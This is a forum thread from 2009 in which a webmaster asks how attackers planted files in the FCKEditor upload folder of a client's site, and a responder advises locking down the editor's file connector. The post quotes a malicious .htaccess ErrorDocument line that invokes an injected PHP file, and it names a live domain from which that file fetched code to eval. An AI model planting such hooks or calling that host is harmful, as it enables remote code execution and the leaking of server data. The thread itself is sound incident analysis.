This is a long post, sorry for that, but please I took time to write it with (hopefully) enough debug informations, I hope somebody will help or at least comment.
I just have found some unwanted files inside my client's website.
I have an hosting account, let's call it main.com
inside it there's a secondary domain, let's call it secondary.com
(you can reach "secondary" website by secondary.com or by main.com/secondary, but this is just debug info and probably off topic)
inside secondary.com there's a CMS I wrote, it uses FCKEditor
This one uses an upload folder for uploaded files, called "userfiles"
inside secondary.com/userfiles there are directories with .htaccess files in it, the content of this files is something like:
Options -MultiViews
ErrorDocument 404 //userfiles/81580.php
that php file is an encrypted file, I decrypted it, it is trying to run code (using eval()) calling pages from 3 different domains, the first 2 are already down, but the 3rd is still active.
the 3rd url is
http://7.xmldata.info/? + a querystring with some private informations taken from the $_SERVER variable.
The response from that website is then run with an eval() call.
The response of that malicious server, by now, is only "?>".
Now my question is how those files have been put inside my hosting.
I don't know if it's because of a bug in old version of FCK I'm using (I don't know the exact version, but the copyright header inside the files say "* Copyright (C) 2003-2005 Frederico Caldeira Knabben" so it's at least 3 years old; and I have to update it to a newer version), or because of the "userfiles" directory running with permissions set to "777".
In the second case, perhaps those files were moved in that dir by another account on the same hosting server ?
By the way, the hosting is Hostgator.
I have to find the reason of this hack or I'll never know how to clean my space for sure.
My backend pages have a login feature so nobody could call the FCK upload using the PHP pages that I wrote. But I wonder if somebody may still upload calling directly some FCK files using the browser or by POST-ing data from another server. And in case that's a bug that was in older (2005) releases but now fixed. Otherwise what are the best practices (like using Apache auth on the entire directory to ensure nobody would call FCK files from the outside, but I think this isn't used).
Fri, 01/09/2009 - 19:21
#1
Re: I got hacked, please help...
Try to run it (without loggin to your CMS) and upload some files to your server. If it works, then you have enabled the connector for everybody, check your config.php file and make sure that only authenticated users can work with it.
IMPORTANT: deleting the test.html file isn't the solution. Any hacker won't use it, he will call directly the connector.
But even if he is able to upload files, the default configuration denies the possibility to upload php files, so of course, you should also take into account a bug in your own CMS, or other scripts that you may have on that server.
Re: I got hacked, please help...
Many thanks.
Actually the FCKEditor version I'm using is so old that the path was
http://www.website.com/..../editor/filemanager/browser/default/connectors/test.html
It does not list files and folders but.. it creates them!
So thanks, that's a good tool and a good tip to test the security of the FCKEditor deployment.
I'll check the documentation about this topic, thanks again.
Pierpaolo D'Aimmo
http://www.daimmo.it